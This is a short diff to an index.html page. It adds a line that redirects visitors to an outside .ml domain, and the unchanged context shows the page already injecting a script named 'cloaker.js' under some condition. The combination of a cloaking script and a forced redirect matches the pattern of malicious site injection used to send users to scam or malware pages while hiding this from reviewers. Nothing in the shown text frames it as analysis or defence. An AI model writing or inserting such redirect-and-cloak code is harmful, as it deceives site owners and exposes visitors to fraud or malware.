--- a/index.html
+++ b/index.html
@@ -13,11 +13,11 @@
         var script = document.createElement('script');
         script.src = 'cloaker.js';
         document.body.appendChild(script);
+        window.location.href = 'https://sachem.ml';
       }
     }
   });
 </script>
-
 </head>
 </body>
 </html>
